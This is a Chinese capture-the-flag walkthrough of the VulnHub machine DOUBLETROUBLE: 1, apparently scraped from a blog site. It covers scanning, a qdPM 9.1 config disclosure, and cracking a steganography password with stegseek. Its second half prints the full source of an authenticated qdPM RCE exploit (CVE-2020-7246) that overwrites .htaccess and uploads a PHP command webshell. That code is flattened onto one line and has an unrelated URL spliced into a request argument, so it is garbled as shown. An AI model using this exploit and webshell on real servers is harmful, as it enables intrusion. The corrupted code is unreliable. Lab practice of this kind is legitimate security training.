vulnhub靶场之DOUBLETROUBLE: 1

【vulnhub靶场之DOUBLETROUBLE: 1】准备:
攻击机:虚拟机kali、本机win10 。
靶机:DOUBLETROUBLE: 1,网段地址我这里设置的桥接,所以与本机电脑在同一网段 , 下载地址:https://download.vulnhub.com/doubletrouble/doubletrouble.ova,下载后直接vbox打开即可 。
知识点:stegseek的安装和使用、qdpm9.1l后门漏洞、nc文件传输、shell反弹、wak提权、脏牛提权(CVE-2016-5195)、sql延时注入、sqlmap使用 。

vulnhub靶场之DOUBLETROUBLE: 1

文章插图
信息收集:
通过nmap扫描下网段内的存活主机地址 , 确定下靶机的地址:nmap -sn 192.168.4.0/24,获得靶机地址:192.168.4.195
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
扫描下端口对应的服务:nmap -T4 -sV -p- -A 192.168.4.195,显示开放了22、80端口,开放了ssh服务、web服务 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
使用dirmap进行目录扫描 , 获得一些目录进行,进行访问测试,最后发现secert存在一张图片 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
qdPM 9.1未授权漏洞:
访问下80端口,发现是一个登录界面,显示了所使用的框架信息:qdpm 9.1,但是之前遇到过一个qdpm9.2漏洞,发现这里也是存在的 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
在网站:https://www.exploit-db.com/搜索下qdpm9.1是否存在可利用的exp , 发现存在未授权访问漏洞,我们可以直接读取/core/config/databases.yml文件,尝试读取下文件信息,获取到数据库账户名和密码:otis/"<?php echo urlencode('rush') ; ?>",但是这个是未开启数据库服务的,应该是没用的信息 , 先收集下再说 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
stegseek获取图片隐藏信息:
根据dirmap扫描出来的目录信息进行访问测试,发现在/secret目录下存在一张图片,下载下来保存,图片显示有otis(上面提到的用户名)、rush(密码中的参数)等信息 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
使用steghide获取文件隐藏信息:steghide info doubletrouble.jpg , 发现是存在隐藏信息的,但是缺少密码无法获取出来,那就尝试下使用隐写爆破工具:stegseek 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
stegseek在kali中需要自己安装,在这个网站:https://github.com/RickdeJager/stegseek/releases下载stegseek_0.6-1.deb,使用:sudo dpkg -i stegseek_0.6-1.deb进行安装 , 安装成功后使用字典进行爆破获得密码和文件名以及登录账户和密码:otisrush@localhost.com/otis666,命令:stegseek --crack doubletrouble.jpg /usr/share/wordlists/rockyou.txt upfine.txt 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图

vulnhub靶场之DOUBLETROUBLE: 1

文章插图
qdpm9.1l后门漏洞:
获得系统登陆的账号和密码:otisrush@localhost.com/otis666后使用qdpm9.1的后门漏洞,同样是在网站:https://www.exploit-db.com/搜索下qdpm9.1是否存在可利用的exp 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图
下载下来exp文件:50175.py(这里我使用的第二个,格式不对需要自己修改 , 修改后的源码见下),然后输入参数执行,命令:python 50175.py -url http://192.168.4.195/ -p otis666 -u otisrush@localhost.com,返回一个后门连接,访问该目录会显示一个文件:542451-backdoor.php 。
vulnhub靶场之DOUBLETROUBLE: 1

文章插图

vulnhub靶场之DOUBLETROUBLE: 1

文章插图
qdpm9.1l后门漏洞利用源码 # Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)# Google Dork: intitle:qdPM 9.1. Copyright2020 qdpm.net# Date: 2021-08-03# Original Exploit Author: Rishal Dwivedi (Loginsoft)# Original ExploitDB ID: 47954# Exploit Author: Leon Trappett (thepcn3rd)# Vendor Homepage: http://qdpm.net/# Software Link: http://qdpm.net/download-qdpm-free-project-management# Version: <=1.9.1# Tested on: Ubuntu Server 20.04 (Python 3.9.2)# CVE : CVE-2020-7246# Exploit written in Python 3.9.2# Tested Environment - Ubuntu Server 20.04 LTS# Path Traversal + Remote Code Execution#!/usr/bin/python3import sysimport requestsfrom lxml import htmlfrom argparse import ArgumentParsersession_requests = requests.session()def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):request_1 = {'sf_method': (None, 'put'),'users[id]': (None, userid[-1]),'users[photo_preview]': (None, uservar),'users[_csrf_token]': (None, csrftoken_[-1]),'users[name]': (None, username[-1]),'users[new_password]': (None, ''),'users[email]': (None, EMAIL),'extra_fields[9]': (None, ''),'users[remove_photo]': (None, '1'),}return request_1def req(userid, username, csrftoken_, EMAIL, HOSTNAME):request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,'.htaccess')new = session_requests.post(HOSTNAME + 'index.php/myAccount/update',files=request_1)request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,'../.htaccess')new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update',files=request_2)request_3 = {'sf_method': (None, 'put'),'users[id]': (None, userid[-1]),'users[photo_preview]': (None, ''),'users[_csrf_token]': (None, csrftoken_[-1]),'users[name]': (None, username[-1]),'users[new_password]': (None, ''),'users[email]': (None, EMAIL),'extra_fields[9]': (None, ''),'users[photo]': ('backdoor.php','<?php if(isset($_REQUEST[\'cmd\'])){ echo"<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>', 'application/octet-stream')}upload_req = session_requests.post(HOSTNAME +'index.php/myAccount/update', files=request_3)def main(HOSTNAME, EMAIL, PASSWORD):url = HOSTNAME + '/index.php/login'result = session_requests.get(url)#print(result.text)login_tree = html.fromstring(result.text)authenticity_token =list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,'login[_csrf_token]': authenticity_token}result = session_requests.post(HOSTNAME + '/index.php/login',data=https://www.huyubaike.com/biancheng/payload, headers=dict(referer=HOSTNAME +'/index.php/login'))# The designated admin account does not have a myAccount pageaccount_page = session_requests.get(HOSTNAME + 'index.php/myAccount')account_tree = html.fromstring(account_page.content)userid = account_tree.xpath("//input[@name='users[id]']/@value")username = account_tree.xpath("//input[@name='users[name]']/@value")csrftoken_ =account_tree.xpath("//input[@name='users[_csrf_token]']/@value")req(userid, username, csrftoken_, EMAIL, HOSTNAME)get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')final_tree = html.fromstring(get_file.content)backdoor =final_tree.xpath("//input[@name='users[photo_preview]']/@value")print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' +backdoor[-1] + '?cmd=whoami')if __name__ == '__main__':print("You are not able to use the designated admin account because they do not have a myAccount page.\n")parser = ArgumentParser(description='qdmp - Path traversal + RCE Exploit')parser.add_argument('-url', '--host', dest='hostname', help='Project URL')parser.add_argument('-u', '--email', dest='email', help='User email(Any privilege account)')parser.add_argument('-p', '--password', dest='password', help='User password')args = parser.parse_args()# Added detection if the arguments are passed and populated, if not display the argumentsif(len(sys.argv) > 1 and isinstance(args.hostname, str) and isinstance(args.email, str) and isinstance(args.password, str)):main(args.hostname, args.email, args.password)else:parser.print_help()

推荐阅读